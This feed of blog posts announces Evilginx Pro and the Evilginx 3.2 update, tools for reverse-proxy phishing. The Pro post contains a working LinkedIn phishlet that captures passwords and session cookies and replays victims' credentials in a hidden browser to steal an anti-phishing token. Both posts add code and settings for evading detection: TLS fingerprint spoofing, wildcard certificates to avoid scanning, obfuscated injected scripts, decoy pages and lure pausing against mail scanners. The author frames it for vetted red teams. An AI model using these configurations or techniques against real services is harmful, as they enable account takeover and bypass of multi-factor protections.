โŒ

Normal view

There are new articles available, click to refresh the page.
Before yesterdayBREAKDEV

Evilginx Pro - The Future of Phishing

27 September 2023 at 11:08

I've teased the idea of Evilginx Pro long enough and I think it is finally time to make a proper reveal of what exactly it is.

Evilginx Pro will be a paid professional version of Evilginx, with extra features and added advanced reverse proxy anti-detection techniques, available only to BREAKDEV RED community members.

If you've not yet applied to the community or you did not receive the approval e-mail from the first round, you can apply again as Round #2 of registration is currently ongoing.

The Pro version caters to professional red teamers and penetration testers who want to see better results during phishing engagements, make the job easier for themselves, and have more time to focus on other aspects of the tasks at hand.

Without further ado, let's jump into the product presentation.

Features

The list of exclusive features available in the Pro version is not final. To start, I want to outline the features I've already implemented, which are guaranteed to be included on day one:

Evilpuppet

Evilpuppet is an additional module that runs alongside Evilginx and manages a Chromium browser in the background.

A quick note here: since there are already multiple ways to detect headless browsers, the Evilpuppet background browser does not launch in headless mode, to prevent unnecessary detections. Instead, it runs with a hidden interface.

Evilpuppet was created mainly in response to new reverse proxy phishing detections introduced on popular websites.

The module serves two purposes:

Secret Token Extraction

More and more websites are implementing extensive JavaScript obfuscation together with the generation of what I call "secret tokens". A secret token is, in general, an encrypted buffer holding telemetry data gathered from the client's web browser. The telemetry often includes the URL of the visited website, which, in the case of a phishing site, would contain the attacker's phishing domain.

The secret token value is often transmitted as a hidden POST parameter. Once retrieved by the server, the token is decrypted and its content is analyzed in search of anomalies that could indicate the sign-in originated from a reverse proxy server hosted on a different domain than the legitimate website.
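
To make the check concrete, here is a minimal Go sketch of the server-side validation just described; the structure, field names and the decryption step are hypothetical stand-ins, since each website rolls its own scheme:

package main

import (
	"fmt"
	"net/url"
	"strings"
)

// tokenTelemetry is a hypothetical view of a decrypted telemetry payload.
type tokenTelemetry struct {
	PageURL string // the URL the browser reported it was loaded from
}

// validateSecretToken performs the anomaly check: after the server decrypts
// the token, it verifies the browser-reported origin matches the real host.
func validateSecretToken(t tokenTelemetry, legitHost string) bool {
	u, err := url.Parse(t.PageURL)
	if err != nil {
		return false // malformed telemetry counts as an anomaly
	}
	// During a reverse proxy phish, the page was served from the attacker's
	// domain, so the reported hostname will not match the legitimate one.
	return strings.EqualFold(u.Hostname(), legitHost)
}

func main() {
	t := tokenTelemetry{PageURL: "https://login.phishing-domain.com/login"}
	fmt.Println(validateSecretToken(t, "www.linkedin.com")) // false: anomaly
}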

If you're interested in learning how secret tokens are generated and how they are used to protect users from reverse proxy phishing, you can watch my x33fcon talk where I explained how to properly implement such protections.

The students of my Evilginx Mastery course can also learn how to evade secret token protection within the private Training Lab.

Sometimes, reverse engineering the JavaScript responsible for gathering telemetry and generating the secret token's value, then hotpatching it, is simply not possible.

This is where Evilpuppet comes in.

Evilpuppet runs as a Node.js application, which controls a Chromium browser automated through Puppeteer. The process of bypassing the secret token protection can be described as follows (a rough code sketch follows the list):

  • When a phished user begins the login process, in which a secret token is generated, Evilpuppet will spawn a browser in the background and open the legitimate website's sign-in page.
  • In the background session, Evilpuppet will enter the credentials supplied by the phished user and initiate the sign-in process.
  • Once the secret token is generated and embedded within the transmitted HTTP packet, Evilpuppet will extract its value and send it back to Evilginx.
  • The secret token generated within the reverse proxy phishing session is then replaced with the secret token extracted from the Evilpuppet background session.
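
The real Evilpuppet module is a Node.js application driving Chromium through Puppeteer. Its code isn't public, so treat the following as only an analogous sketch of the same flow in Go, using the chromedp library instead: open the real sign-in page, replay the phished user's credentials, and watch outgoing requests for the token. The selectors match the LinkedIn phishlet shown further below; the PostData field may differ between cdproto versions.

package main

import (
	"context"
	"log"
	"regexp"
	"time"

	"github.com/chromedp/cdproto/network"
	"github.com/chromedp/chromedp"
)

func main() {
	ctx, cancel := chromedp.NewContext(context.Background())
	defer cancel()

	apfcRe := regexp.MustCompile(`apfc=([^&]*)`)
	tokenCh := make(chan string, 1)

	// Watch outgoing requests for the login submission carrying the token.
	chromedp.ListenTarget(ctx, func(ev interface{}) {
		if e, ok := ev.(*network.EventRequestWillBeSent); ok {
			if m := apfcRe.FindStringSubmatch(e.Request.PostData); m != nil {
				select {
				case tokenCh <- m[1]:
				default:
				}
			}
		}
	})

	// Replay the phished user's credentials in the background session.
	if err := chromedp.Run(ctx,
		network.Enable(),
		chromedp.Navigate("https://www.linkedin.com/login"),
		chromedp.SendKeys("#username", "victim@example.com", chromedp.ByQuery),
		chromedp.SendKeys("#password", "secret-password", chromedp.ByQuery),
		chromedp.Click("button[type=submit]", chromedp.ByQuery),
		chromedp.Sleep(3*time.Second), // allow the login request to fire
	); err != nil {
		log.Fatal(err)
	}

	// The extracted token would be handed back to the proxy session here.
	log.Println("captured apfc token:", <-tokenCh)
}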

You may be wondering: how is this possible? Why isn't the secret token tied to the specific sign-in session, to prevent attackers from reusing secret tokens generated in different sessions?

Unfortunately, what makes it possible is the fact that HTTP communication is stateless by design. You can emulate state by including specific session tokens as cookies or authorization headers, but all of that can be replayed by the attacker. If we could tie a sign-in session to a TLS handshake, for example, this would be a different story. There was once a lot of buzz about the concept of Token Binding, but I believe the idea did not take off.

If you've recently tried using Evilginx to phish LinkedIn, you may have noticed the phished account is locked out immediately when a reverse proxy phishing attack succeeds. This happens because Microsoft implemented reverse proxy phishing session detection through the generation of a secret token.

You can see the secret token transmitted with the POST login request as a hidden apfc parameter.


Evilginx Pro with Evilpuppet will capture the value of the apfc parameter in the background browser session and inject it into the reverse proxy session, effectively circumventing the protection and making the LinkedIn server think the sign-in happened on the legitimate website.

Here is a short video of Evilginx Pro successfully phishing a LinkedIn user while extracting a secret token with the background browser. As a bonus, enjoy some extra Cyberpunk music I made!

NOTE: The Chromium browser runs in the background, on the Evilginx server, and will not be visible. It is shown in the video for demonstration purposes only.

๐ŸŽฌPhishing LinkedIn and bypassing MFA demo created for the upcoming Evilginx Pro post ๐Ÿ”ฅ

๐Ÿ’กEvilginx uses a background browser to capture the secret token from legitimate website and inject it back into the reverse proxy phishing session.

P.S. Enjoy that Cyberpunk tune I made ๐ŸŽต pic.twitter.com/rkbOmVSdeb

โ€” Kuba Gretzky (@mrgretzky) September 26, 2023

To learn more about how Evilpuppet can be automated with Evilginx Pro, you can look into the LinkedIn phishlet, which was used in the demo video:

min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
  - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'www.linkedin.com', search: '<\/head>', replace: '<style>#artdeco-global-alert-container {display: none !important;} .alternate-signin-container {display: none !important;}</style></head>', mimes: ['text/html']}
auth_tokens:
  - domain: '.www.linkedin.com'
    keys: ['li_at']
credentials:
  username:
    key: 'session_key'
    search: '(.*)'
    type: 'post'
  password:
    key: 'session_password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'www.linkedin.com'
  path: '/login'
js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);
evilpuppet:
  triggers:
    - domains: ['www.linkedin.com']
      paths: ['/checkpoint/lg/login-submit']
      token: 'apfc'
      open_url: 'https://www.linkedin.com/login'
      actions:
        - selector: '#username'
          value: '{username}'
          enter: false
          click: false
          post_wait: 500
        - selector: '#password'
          value: '{password}'
          enter: false
          click: false
          post_wait: 500
        - selector: 'button[type=submit]'
          click: true
          post_wait: 1000
  interceptors:
    - token: 'apfc'
      url_re: '/checkpoint/lg/login-submit'
      post_re: 'apfc=([^&]*)'
      abort: true

Evilpuppet support is already included in the official documentation, so please check that out if you want to learn how the evilpuppet section of a phishlet works.

For comparison, you can use the same phishlet with the public version of Evilginx and observe how the account gets locked after a successful phish, when there is no Evilpuppet to inject the legitimate apfc secret token.

Post-Phishing Automation

This feature is not yet completed, but the end goal is to allow Evilpuppet to use the captured session tokens and log into the phished service on behalf of the phished user.

Once logged in, it could be instrumented to perform specific actions on the phished user's account, such as changing account settings or exfiltrating data.

The idea is to create a full-blown post-phishing automation framework similar to what Necrobrowser does in the Muraena project.

Wildcard TLS Certificates

Evilginx Pro officially supports automatic retrieval and renewal of wildcard TLS certificates from LetsEncrypt.

One of the most annoying aspects of using Evilginx with LetsEncrypt was that whenever Evilginx requested TLS certificates for all of the phishing subdomains, the certificate for a given phishing domain would immediately be published in the Certificate Transparency log.

Once the certificate lands in the log, dozens of automated scanners begin scanning the domains attached to newly issued TLS certificates, looking for malicious intent. You could observe this happening in the Evilginx terminal, with multiple unauthorized requests to your phishing domain popping up right after the LetsEncrypt TLS certificate was issued.

Wildcard certificates do not carry the same problem. Even though they land in the same Certificate Transparency log, automated scanners have no idea which subdomains to scan, because the Common Name attached to a wildcard TLS certificate looks like *.baddomain.com and any subdomain could be used.

Using Evilginx Pro with wildcard certificates will prevent your phishing domains from being scanned when TLS certificates from LetsEncrypt are issued, allowing your phishing campaigns to remain undetected much longer.
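
For the curious, here is a minimal Go sketch of what wildcard issuance looks like with the certmagic library (the same library the public Evilginx uses for certificate management); the DNS provider wiring is omitted, as it varies between certmagic versions and DNS providers:

package main

import (
	"crypto/tls"
	"log"

	"github.com/caddyserver/certmagic"
)

func main() {
	certmagic.DefaultACME.Agreed = true
	certmagic.DefaultACME.Email = "admin@baddomain.com" // hypothetical

	// Wildcard names can only be issued via the DNS-01 challenge, so a
	// libdns-compatible DNS provider must be configured on
	// certmagic.DefaultACME.DNS01Solver before this call.

	tlsConfig, err := certmagic.TLS([]string{"*.baddomain.com"})
	if err != nil {
		log.Fatal(err)
	}

	// Every subdomain of baddomain.com is now served with a single wildcard
	// cert, and the CT log entry reveals only *.baddomain.com. Renewal is
	// handled automatically by certmagic.
	ln, err := tls.Listen("tcp", ":443", tlsConfig)
	if err != nil {
		log.Fatal(err)
	}
	defer ln.Close()
}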

JA3 Fingerprinting Evasion

Methods to detect reverse proxy phishing have been similar to methods to detect web scraping bots. Scraper bots are very often written in a specific programming language like Java, Go or Python, and each of these languages implements an HTTP library with its own fingerprintable characteristics.

One such fingerprinting method is called JA3, and it is increasingly being adopted by major companies.

The idea is to detect the specific combination of TLS ciphers supported by the HTTP client attempting to connect to the server. The list of TLS ciphers is exchanged during the TLS handshake. As an example, Google Chrome will have a different list of supported TLS ciphers than the HTTP library used in Go or Python.

Evilginx Pro will always imitate the TLS cipher list of popular web browsers, to evade any form of JA3 fingerprinting and make its connections look as close to casual web browser traffic as possible.
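
This is not necessarily the exact implementation in Evilginx Pro, but a common way to achieve this in Go is the uTLS library, which swaps crypto/tls's ClientHello for one copied from a real browser. A minimal sketch:

package main

import (
	"log"
	"net"

	utls "github.com/refraction-networking/utls"
)

func main() {
	raw, err := net.Dial("tcp", "www.linkedin.com:443")
	if err != nil {
		log.Fatal(err)
	}
	defer raw.Close()

	// Wrap the TCP connection in a ClientHello copied from current Chrome,
	// so the resulting JA3 hash matches a real browser instead of Go's
	// default crypto/tls fingerprint.
	conn := utls.UClient(raw, &utls.Config{ServerName: "www.linkedin.com"}, utls.HelloChrome_Auto)
	if err := conn.Handshake(); err != nil {
		log.Fatal(err)
	}
	log.Printf("handshake complete, TLS version: %x", conn.ConnectionState().Version)
}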

Daemonization and Multi-User Collaboration

Currently, Evilginx is both a client and a server in one application. This makes Evilginx fairly easy to use, but it also introduces a set of problems, making it harder to deploy and manage at scale.

The only way to run Evilginx in the background, right now, is to execute it within a tmux or screen session. This complicates launching Evilginx on boot, as the launch script needs to manage tmux sessions as well. It also means that every instance of Evilginx needs to be controlled over an SSH connection, which is often not ideal.

My plan with Evilginx Pro is to make the server fully daemonized and allow it to be controlled through an exposed admin API by Evilginx Pro client applications. Both the Evilginx server and the Evilpuppet Node.js application would run as daemons, awaiting connections from Evilginx clients.

The Evilginx Pro server would expose a full API, accessible over a standard HTTPS connection on the default port 443. API access would be protected with an authorization token identifying the Evilginx admin user.

This new client-server architecture would allow multi-user collaboration across multiple Evilginx Pro instances. Every user with a valid Evilginx Pro license would be able to interact with any Evilginx Pro server instance set up with the same license.

Evilginx Pro clients will look and feel the same way as the current Evilginx terminal UI. The only difference with Evilginx Pro will be that you'd be using one terminal to control multiple remote server instances. The introduction of a full-blown API to control Evilginx instances will also allow automating Evilginx server setup and, one day, it may even be possible to develop a web UI for Evilginx.
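
The API design is not final, but the described scheme (HTTPS on port 443 plus an authorization token) could look something like the sketch below; the endpoint name and token handling are my illustrative assumptions, not the final Evilginx Pro API:

package main

import (
	"crypto/subtle"
	"log"
	"net/http"
)

// adminToken is a stand-in for the per-user authorization token.
const adminToken = "replace-with-a-long-random-token"

func authorized(r *http.Request) bool {
	want := "Bearer " + adminToken
	got := r.Header.Get("Authorization")
	return subtle.ConstantTimeCompare([]byte(got), []byte(want)) == 1
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/sessions", func(w http.ResponseWriter, r *http.Request) {
		if !authorized(r) {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		w.Header().Set("Content-Type", "application/json")
		w.Write([]byte(`[]`)) // would list captured sessions
	})
	// In the described design this listens on 443, next to the phishing proxy.
	log.Fatal(http.ListenAndServeTLS(":443", "cert.pem", "key.pem", mux))
}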

Licensing System

It is important to note that a valid BREAKDEV RED community account will be required to be eligible to obtain an Evilginx Pro license. This means that only people qualified to join the community will be allowed to purchase Evilginx Pro licenses. This is to limit the misuse of Evilginx Pro's extra offensive capabilities and make sure that only vetted personnel use the Pro version.

Due to the separation of server and client in Evilginx Pro, communication with the BREAKDEV licensing server will take place only on the side of the Evilginx client applications. Since Evilginx server instances are critical to operational security during red team engagements or phishing simulations, they will not make any unnecessary outgoing connections to licensing servers. The only established connections will be the ones required for reverse proxy sessions to work properly.

Multiple Base Domains Support

At the moment, Evilginx allows the use of only a single base domain, configured globally, which is used by every activated phishlet. If your configured base domain is fake.com, every lure URL you generate, even for different phishlets, will use a hostname ending with fake.com.

Evilginx Pro allows more flexibility with the configuration of multiple base domains. These can later be assigned to individual phishlets or individual lures.

Phishlets will be assigned the last used domain from the list, which will then automatically be used for the generation of new lures, but you can also override the selected domain and pick a different one from the list of supported domains for each lure separately.

No Detectable Artifacts

I made sure to strip Evilginx Pro of any identifiable artifacts, and I don't mean only the removal of the infamous X-Evilginx header.

Evilginx Pro is much harder to identify for automated scanners and for the HTTP servers it connects to.

Server Stealth Overhaul

You will now have options for how to handle unauthorized requests. At the moment, unauthorized requests either redirect the visitor to a different URL, through the injection of a Location header in the HTTP response, or throw a 403 Forbidden HTTP error.

Evilginx Pro allows you to either use the default method or:

  • Display the contents of another website under the same domain, using reverse proxy functionality similar to proxy_pass in Nginx (sketched below).
  • Respond with custom HTML content stored in the local directory.
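
The first option behaves much like Nginx's proxy_pass. Here is a minimal Go sketch of the idea, built on the standard library's reverse proxy; the decoy URL and lure check are hypothetical stand-ins:

package main

import (
	"net/http"
	"net/http/httputil"
	"net/url"
)

// isValidLure stands in for Evilginx's real lure/session validation.
func isValidLure(r *http.Request) bool { return false }

func main() {
	// Harmless site shown to unauthorized visitors under the phishing domain.
	decoy, _ := url.Parse("https://harmless-blog.example.com") // hypothetical
	decoyProxy := httputil.NewSingleHostReverseProxy(decoy)

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		if !isValidLure(r) {
			r.Host = decoy.Host        // rewrite Host so the decoy responds
			decoyProxy.ServeHTTP(w, r) // proxy_pass-style camouflage
			return
		}
		// ...handle the legitimate phishing session here.
	})
	http.ListenAndServe(":8080", nil)
}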

HTML and JavaScript Obfuscation

Evilginx Pro implements much smarter techniques for evading phishing page detection.

All of the JavaScript and HTML content injected through js_inject or hosted through lure redirectors will now be delivered dynamically obfuscated, making it much harder for signature-based detections to flag the hosted content as malicious.

Some of you have had a lot of success hosting your phishing pages behind additional obfuscation layers like Cloudflare. Research has also been published describing how effective content obfuscation is at protecting phishing pages.

It makes sense for HTML and JavaScript obfuscation to be natively supported by Evilginx, without having to overcomplicate your infrastructure with external services.
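
As a toy illustration of what dynamic obfuscation means in practice, here is a Go sketch that re-encodes a script with a fresh random key on every delivery, so no two responses share a byte signature; Evilginx Pro's actual scheme is, of course, more sophisticated:

package main

import (
	"crypto/rand"
	"encoding/base64"
	"fmt"
)

// obfuscateJS re-encodes a script with a fresh single-byte XOR key, so every
// delivery differs on the wire and decodes itself client-side. A toy scheme,
// purely to illustrate the concept of per-request dynamic obfuscation.
func obfuscateJS(script string) string {
	key := make([]byte, 1)
	rand.Read(key)
	enc := []byte(script)
	for i := range enc {
		enc[i] ^= key[0]
	}
	b64 := base64.StdEncoding.EncodeToString(enc)
	return fmt.Sprintf(
		`(function(){var d=atob(%q),o="";for(var i=0;i<d.length;i++){o+=String.fromCharCode(d.charCodeAt(i)^%d)}(0,eval)(o)})();`,
		b64, key[0])
}

func main() {
	// Two calls produce two different byte sequences for the same payload.
	fmt.Println(obfuscateJS(`console.log("injected");`))
	fmt.Println(obfuscateJS(`console.log("injected");`))
}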

Auto-Deploy Scripts

Evilginx Pro comes with easy-to-use bash scripts for deploying Evilginx to external servers.

You can deploy Evilginx to a remote server by running a single command:

SSH_KEY_FILE=~/keys/ssh.key SSH_USER=admin ./deploy.sh 1.2.3.4

You can learn more about the automatic deployment script here. The usage may slightly change in the final product, but it will always remain as easy as using a single command.

Closed Source

I want to note here that Evilginx Pro will not be released as open-source. This decision comes from my wish to lower the risk of possible source code leaks, which could lead to unauthorized use of the tool.

I expect to make exceptions for companies that need to perform due diligence before using the tool, to gain guarantees that it securely stores and manages critical operational data, protecting their own customers.

Final Thoughts

I expect Evilginx Pro to be released in Q4 2023 or Q1 2024, with a license price tag of 1,200-1,400 EUR per seat, billed annually. The price is not final and will depend heavily on product demand. The higher the demand, the lower the price will be.

There will be no limit on how many Evilginx Pro servers you deploy. The license will be required only by the Evilginx Pro client application, assigned to a specific user, from which it will be possible to communicate with all deployed servers. In short, every red teamer will need one named license, which will let them connect to an unlimited number of Evilginx Pro server instances created for the same license.

Everyone who has been accepted into the BREAKDEV RED community will soon receive a link to the form with several questions, through which I'll be gathering feedback on Evilginx Pro.

Thank you in advance if you take the time to fill it out! Your answers will be used to make Evilginx Pro a better product.

If you haven't yet applied to become a member of the BREAKDEV RED community, round 2 of registrations is up! Please apply here.

I wish you all the best and, as always, expect updates to show up on my Twitter @mrgretzky.

BREAKDEV RED - Red Team Community

30 August 2023 at 11:59

Today I want to announce my plan for creating a closed community for professional red teamers working in red team companies, who perform phishing engagements as part of their job.

Read more about it below, but if you're already ready to sign up, here is the button, which will take you to the registration form:

Red Teams United

My idea is to create a vetted Discord community, oriented around using Evilginx and ethical phishing, where everyone can safely share their phishing tips and tricks without having to worry about such information being misused by malicious parties.

I plan to launch a community repository for Evilginx phishlets, which will be maintained by me and other red teamers from the same trusted BREAKDEV RED community. Every community member will be granted free access to the repository and everyone will be able to contribute their own phishlets.

Additionally, all community members will be granted the ability to purchase licenses for Evilginx Pro as soon as it lands. The reveal of all the upcoming features will happen in the coming weeks. I expect Evilginx Pro to become a game-changer in professional phishing, solving a lot of issues around detection and adding the ability to bypass the latest reverse proxy phishing mitigations.

One of my main concerns is for Evilginx Pro to not fall into the hands of wrongdoers, which is the number one reason why I want to establish the trusted community in the first place.

Benefits for BREAKDEV RED members:

  • FREE access to the private Evilginx phishlets repository on GitHub, maintained by me and other Evilginx power users.
  • FREE access to the private BREAKDEV RED community on Discord, where you can interact with fellow red teamers, who went through the same vetting process as you did.
  • (OPTIONAL) Ability to purchase licenses for Evilginx Pro when it comes out sometime later this year or early 2024.

I have already confirmed that Discord communities can be highly beneficial for brainstorming and for Evilginx development. One great example was when @JackButton_ shared, on the Evilginx Mastery Discord, how he implemented his own idea of signature-based evasion and automated scan prevention using Cloudflare.

How do I sign up?

First of all, here is a list of requirements you need to fulfill, in order to be granted membership:

Registration requirements:

  • You're an employee or an owner of a cybersecurity company offering legal penetration testing services, with a focus on phishing simulations.
  • The provided contact e-mail should be hosted on the company domain. Sorry, no free domains (Gmail, Protonmail etc.), since those carry the risks of impersonation.
  • Your company should have a public website outlining the services it provides in the area of cybersecurity.

Once your status is approved, I will send an email with a final confirmation request to the address you provided.

If by any chance you do not use company emails hosted on the company domain, please explain in the "Comments" section of the form and we will work something out.

If you're ready to sign up, clicking this button will lead you to the registration form:

FAQ

What is Evilginx Pro?

It is a privately maintained version of Evilginx, which offers:

  • Evasion of widely employed phishing detection mechanisms.
  • Extra features like extraction of secret tokens, using an entirely new Evilpuppet module, responsible for interfacing Evilginx with a background browser.
  • Reverse proxy support for most popular services (including Google, LinkedIn and more).

I will release a blog post soon, going into detail on what exactly the Pro version is about.

Update: The blog post is out.

What is the registration form about?

Since I do not want any of the community benefits to be abused or misused, I want to offer them EXCLUSIVELY to legitimate cybersecurity companies offering red teaming and/or penetration testing services.

Your answers allow me to learn more about your company and decide whether to put it on the list of trusted companies interested in becoming Evilginx power users.

Evilginx 3.2 - Swimming With The Phishes

24 August 2023 at 10:02

Welcome back!

I've recently managed to find some free time to work on reverse proxy support for the latest Google updates and in the process I've made several additions to the Evilginx code base, which I think some of you will find useful.

To start, I wanted to give a big shoutout to Daniel (@dunderhay) for publishing a great post on how he used Evilginx to phish a Microsoft 365 ADFS environment and the modifications he made to succeed!

Evilginx is getting more love this year than in the last couple of years and I'm very happy about it. I have big plans for Evilginx, which I will announce soon, but first I wanted to give you a rundown of what the latest 3.2 update consists of.

I will start with the most significant changes.

Dynamic Redirection on Session Capture

One of the behaviours that annoyed me when using Evilginx was that sometimes it was not possible to immediately redirect the phished user to the configured redirect_url once all session tokens were captured. Evilginx could only redirect the browser once the targeted website attempted to navigate to a different page on its own.

This meant redirects did not work on single-page applications, which I learned first-hand during the development of the Training Lab for my Evilginx Mastery course. The main page of the lab changes its contents dynamically and never navigates to a different URL, so once session tokens were captured by Evilginx, the tool was unable to redirect the user to the redirect_url address.

In the 3.2 update, I've managed to solve the problem with injected JavaScript sending HTTP long polling requests on every proxied page, to retrieve session capture status directly from the Evilginx proxy server in real-time. Evilginx will inject its own JavaScript code on every HTML page load, responsible for querying https://<phish_domain>/s/<phish_session_id> indefinitely. The Evilginx proxy server will respond with a JSON structure, containing the redirect_url value, only when the session is successfully captured. Otherwise, the connection will time out after 30 seconds and be retried. Long polling lets the injected script know that the session was captured the moment it happens.

The script will then change the window.location URL to the retrieved redirect_url value, redirecting the user to a preconfigured page address. Redirection should now work great within the Evilginx Mastery Training Lab.

Instead of HTTP long polling, I could've used WebSockets, but I wanted to keep it simple without the need to rely on external libraries, which would need to be injected as well.
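
Server-side, the long-polling endpoint boils down to holding the request open until the session flips to captured, or until the 30-second timer fires. A simplified Go sketch, with hypothetical hooks into the session store:

package main

import (
	"encoding/json"
	"net/http"
	"strings"
	"time"
)

// sessionCaptured and redirectURL are hypothetical hooks into the session
// store; the channel would be closed once all tokens for sid are captured.
func sessionCaptured(sid string) <-chan struct{} { return make(chan struct{}) }
func redirectURL(sid string) string              { return "https://example.com/done" }

// captureStatusHandler holds the request open until capture or a 30s timeout,
// mirroring the long-polling behaviour described above.
func captureStatusHandler(w http.ResponseWriter, r *http.Request) {
	sid := strings.TrimPrefix(r.URL.Path, "/s/")
	select {
	case <-sessionCaptured(sid):
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(map[string]string{"redirect_url": redirectURL(sid)})
	case <-time.After(30 * time.Second):
		w.WriteHeader(http.StatusNoContent) // timed out; injected JS retries
	}
}

func main() {
	http.HandleFunc("/s/", captureStatusHandler)
	http.ListenAndServe(":8080", nil)
}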

Temporary Lure Pausing


Imagine a situation: you're on a phishing engagement and finally get to send out your phishing lures. Once the emails start arriving at the target inbox, the mailbox server opens them one by one and scans the HTML content of every phishing URL. The mail server then flags the emails as phishing and sends them to quarantine.

There are many ways to prevent automated scanners from seeing the content of your phishing pages, but the most straightforward method is to simply hide your phishing pages for a brief moment, right before you send out the emails. Long enough to hide their content from automated scanners, but not from the targeted user.

Now you can easily hide your lures from prying eyes by pausing them for a specific time duration with:

lures pause <id> <time_duration>

The best part is that you don't have to worry about unpausing a lure manually. Once the pause period expires, the lure will become active again and you will get a notification about it in the terminal. The pause state also persists between Evilginx restarts.

Interception of HTTP Requests

I found out that sometimes it would be useful to be able to block some of the proxied requests or have them return custom responses, without them ever reaching the destination server.

Now you can detect specific requests within the new intercept section in your phishlets, which matches specific URL paths on domains within your proxy_hosts list. Once a request matches your filters, you can detour it and return your own response with a custom HTTP status code.

intercept:
  - {domain: 'www.linkedin.com', path: '^\/report_error$', http_status: 200, body: '{"error":0}', mime: "application/json"}
  - {domain: 'app.linkedin.com', path: '^\/api\/v1\/log\/.*', http_status: 404}

In the example above, any request to https://www.linkedin.com/report_error will be intercepted and will return HTTP status 200 with response body {"error":0} and MIME type application/json.

The second entry makes sure that all requests to https://app.linkedin.com/api/v1/log/<whatever> return a 404 Not Found HTTP response.

Redirect URL Added to Phishlets

Sometimes, for the phishlet to work properly and not interrupt the phished user's experience, it needs to redirect the user's browser right after session tokens are successfully captured. Until now, the redirect would happen only if redirect_url was specified for the lure used in the phishing engagement.

At times, it is important to have a default redirect_url specified, especially if we want the user to be redirected to the home page of the phished website by design. Sometimes the redirection to the home page will happen automatically, but sometimes it needs to be enforced.

From this Evilginx version, you can set a default redirect_url in the phishlet you are creating to make sure the phished user is redirected, once session tokens are captured, even if redirect_url has not been set up for the given lure.

Unauthorized Request Redirects Per Phishlet

First of all, I've renamed redirect_url in the global config to unauth_url, to better illustrate its purpose and to avoid confusion with the redirect_url set up in phishlets or lures.

IMPORTANT! Keep in mind that the URL you set for unauthorized request redirects may reset itself after the update, due to the name change.

The unauthorized URL, or unauth_url, holds the address visitors will be redirected to if they open any URL on the phishing domain that doesn't correspond to a valid lure, or if the lure is currently paused.

Until now, it was possible to set unauth_url only globally, providing the same redirect URL for all active phishlets. With 3.2, you can override the global unauth_url by specifying a value for each phishlet with:

phishlets unauth_url <phishlet> <url>

This feature was suggested by @0x_aalex who was also kind enough to submit a PR with his implementation. Thank you for that!

Tweaks and Fixes

In addition to several new features, Evilginx has also received some QoL tweaks and fixes, which should improve the overall phishing performance.

Disabled caching of proxied content by web browsers

It was especially frustrating to test the sub_filters of your phishlets, because your web browser would cache the content from before your modification. Every time you made small changes and had to retest, you had to clear the browser cache.

Starting from the 3.2 update, Evilginx will prevent web browsers from caching HTML, JavaScript and JSON content by injecting a Cache-Control: no-cache, no-store HTTP header into proxied responses.

This should also make working with js_inject much more convenient.

JavaScript injected through external references

Normally, when your phishlets inject JavaScript through the js_inject functionality, Evilginx would drop the whole script into the content of the HTML page within <script>...</script> tags. This approach was kind of messy, so I figured out a way to inject multiple scripts as external references, like this:

<script type="application/javascript" src="/s/48d378a85f0867ef16bf0fd28deda0d4b30139c54805033803e7fdcbc31f293c/2628b4fe94aa35effbe26d64ed6decd00c9d26fb53aa0dfb57836055a27e38cf.js"></script>
<script type="application/javascript" src="/s/48d378a85f0867ef16bf0fd28deda0d4b30139c54805033803e7fdcbc31f293c.js"></script>

Requests to download these external JavaScript resources will be intercepted by the Evilginx proxy and the response will be delivered from Evilginx directly, without ever being forwarded to the destination website.

This approach should make it possible to introduce dynamic JS obfuscation, in the future. (Stay tuned!)
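
Conceptually, the interception is a short-circuit in the proxy's request path: if the URL matches a generated /s/... script reference, the stored script is served locally and the request is never forwarded upstream. A simplified sketch of the idea in Go (the script store is a hypothetical stand-in):

package main

import (
	"net/http"
	"strings"
)

// scriptStore maps generated /s/<session>/<script>.js paths to script bodies;
// a hypothetical stand-in for Evilginx's internal bookkeeping.
var scriptStore = map[string][]byte{}

// serveInjectedJS answers matching script requests locally; anything else
// falls through to the normal proxying logic.
func serveInjectedJS(w http.ResponseWriter, r *http.Request) bool {
	if !strings.HasPrefix(r.URL.Path, "/s/") || !strings.HasSuffix(r.URL.Path, ".js") {
		return false
	}
	body, ok := scriptStore[r.URL.Path]
	if !ok {
		http.NotFound(w, r)
		return true
	}
	w.Header().Set("Content-Type", "application/javascript")
	w.Header().Set("Cache-Control", "no-cache, no-store") // see caching fix above
	w.Write(body)
	return true
}

func main() {
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		if serveInjectedJS(w, r) {
			return
		}
		// ...forward every other request to the destination website.
	})
	http.ListenAndServe(":8080", nil)
}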

Changelog

Here is the full changelog for Evilginx 3.2:

  • Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.
  • Feature: Lures can now be paused for a fixed time duration with lures pause <id>. Useful when you want to briefly redirect your lure URLs when you know sandboxes will try to scan them.
  • Feature: Added phishlet ability to intercept HTTP requests and return custom responses via a new intercept section.
  • Feature: Added a new optional redirect_url value for phishlet config, which can hold a default redirect URL, to redirect to, once tokens are successfully captured. redirect_url set for the specific lure will override this value.
  • Feature: You can now override globally set unauthorized redirect URL per phishlet with phishlet unauth_url <phishlet> <url>.
  • Fixed: Disabled caching for HTML and JavaScript content to make on-the-fly proxied content replacements and injections more reliable.
  • Fixed: Blocked requests will now redirect using JavaScript, instead of the HTTP Location header.
  • Fixed: Improved JS injection by adding <script src="..."> references into HTML pages, instead of dumping the whole script there.
  • Fixed: Changed redirect_url to unauth_url in global config to avoid confusion.
  • Fixed: Fixed HTTP status code response for JavaScript redirects.
  • Fixed: JavaScript redirects now happen on text/html pages with valid HTML content.
  • Fixed: Removed ua_filter column from the lures list view. It is still viewable in lure detailed view.

Closing Thoughts

Hope you enjoy this update and there is more to come for Evilginx!

If you are interested in mastering the Evilginx phishing framework, consider checking out my Evilginx Mastery course:

